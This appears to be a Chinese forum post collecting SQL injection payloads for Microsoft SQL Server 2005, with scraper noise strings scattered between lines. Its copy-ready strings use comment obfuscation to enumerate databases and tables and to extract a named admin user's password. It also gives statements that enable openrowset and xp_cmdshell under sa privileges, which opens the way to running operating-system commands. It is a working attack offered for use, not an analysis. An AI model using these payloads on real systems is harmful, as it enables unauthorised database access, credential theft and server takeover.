MSsql2005注入语句

admin

' q. u! Q5 x% h* B/ q8 ?. w
[Copy to clipboard]CODE:
  u! P+ V5 W8 U! n& ]6 n. L* L/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
! I8 m" y! L/ c7 Q! K2 E- i' }2 I0 G
爆表语句,somedb部份是所要列的数据库，红色数字1累加
" R; d" w# [  N! P' p- D9 i8 b: }
; e* e% G8 a& [0 B
[Copy to clipboard]CODE:
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--

爆字段语句，爆表admin里user='icerover'的密码段
0 ?3 X+ L" p( Z8 A* Q4 g( d

[Copy to clipboard]CODE:
  F* q+ N( d+ c**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--

mssql2005默认没有开xp_cmdshell的，openrowset也不能用
如果是sa权限，可以这样来开启
( G# H! y; @; s+ t5 f开启openrowset
( S$ U" J9 k/ c: v/ n: B! c$ W# T
! H1 j/ r: Z0 D  y
[Copy to clipboard]CODE:
8 U( d1 k8 a7 V- w6 L/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
9 U7 w. T' i# U! h3 P
开启xp_cmdshell


[Copy to clipboard]CODE:
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--

: k9 s, l: Q1 x( l9 A& L5 Iok,over~~晚安
1 _+ C' F. z. b& l- j* ]